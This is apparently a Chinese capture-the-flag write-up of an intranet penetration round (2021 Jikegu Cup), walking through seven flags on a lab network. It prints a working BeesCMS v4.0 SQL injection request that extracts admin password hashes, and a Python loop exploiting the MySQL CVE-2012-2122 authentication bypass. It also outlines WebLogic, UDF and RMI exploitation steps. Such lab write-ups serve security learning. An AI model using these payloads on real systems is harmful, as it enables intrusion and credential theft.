大佬能不能分享 weblogic和RMI这两款工具?
比赛情况
2021极客谷杯
Break环节:在Break环节中,参赛选手以攻击者的身份对模拟的企业内网进行内网渗透、内网穿透等操作,获取不同目标服务器的权限。
靶场1一共7个flag,全部ak
靶机信息
地址:1.13.24.8
端口:80
flag6
目录扫描,发现robots.txt
http://1.13.24.8/robots.txt
flag6{4177d24e50af8fedb2e9e385cf6eae9e}
flag7
访问首页,很明显的beescms,搜索相关漏洞发现存在Beescms_v4.0 sql注入漏洞,直接利用exp,注入得后台用户名密码
POST /admin/login.php?action=ck_login HTTP/1.1
Host: 1.13.24.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://1.13.24.8
Connection: close
Referer: http://1.13.24.8/admin/login.php
Cookie: PHPSESSID=7pa2vqf1pn0ckl8eac208ao610
Upgrade-Insecure-Requests: 1
user=admin'a+and+nd+extractvalue(1,concat(0x7e,(seselectlect+admin_password+f+from+rom+bees_admin+limit+0,1),0x7e))#&password=admin123&code=e82b&submit=true&submit.x=66&submit.y=23
bs_admin、ae3700364f2111b2cea75d8e19d2331,md5解密得admin、aabbccdd@123
后台可以直接文件上传getshell,获得flag7
flag7{faf1a4048d9ede1d4ba9b826b3735d5f}
flag1
tmp目录下发现flag
flag1{c5ed891826097543a066a77c8f627040}
flag5
查看ip信息,为172.16.25.10
搞好代理以后,fscan扫描:
172.16.25.10:80 open
172.16.25.1:80 open
172.16.25.16:3306 open
172.16.25.30:7001 open
172.16.25.1:22 open
[] WebTitle:http://172.16.25.30:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan:http://172.16.25.30:7001 [weblogic]
[+] mysql:172.16.25.16:3306:root root123
[] WebTitle:http://172.16.25.1 code:200 len:141 title:BEES浼佷笟缃戠珯绠$悊绯荤粺_浼佷笟寤虹珯绯荤粺_澶栬锤缃戠珯寤鸿_浼佷笟CMS_PHP钀ラ攢浼佷笟缃戠珯妯
[*] WebTitle:http://172.16.25.10 code:200 len:141 title:BEES浼佷笟缃戠珯绠$悊绯荤粺_浼佷笟寤虹珯绯荤粺_澶栬锤缃戠珯寤鸿_浼佷笟CMS_PHP钀ラ攢浼佷笟缃戠珯妯
[+] http://172.16.25.30:7001 poc-yaml-weblogic-cve-2020-14750
发现weblogic,可以直接利用cve-2020-2551
flag5{419aba19867bbb8de92efd4c66b12926}
flag3
尝试[+] mysql:172.16.25.16:3306:root root123 登陆MySQL,发现一直提示密码错误
奇怪???难道fscan误报了嘛?
使用goby扫描
发现mysql:172.16.25.16:3306 存在cve-2012-2122,仔细研究这个cve发现:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
因此fscan扫描出来的结果应该正好是尝试爆破mysql密码,在爆破到root123 时产生了溢出,因此判断为登录成功
网上找到exp
#!/usr/bin/python
import subprocess
while 1:
subprocess.Popen("mysql -h 172.16.25.16 -u root mysql --password=blah", shell=True).wait()
成功利用,找到flag3
flag3{7b87dd51036fe42f2bd83e1911732a65}
flag4
给了hint,继续使用udf提权
提权成功拿到flag4
flag4{a89b07eebc0f1a5d4de5e4eb78b43ea4}
flag2
搞了半天死活找不到flag2,遂做一次内网全端口扫描,发现172.16.25.20开放了32222端口和40909端口,为rmi服务,未授权访问直接连接可以执行命令,获得flag2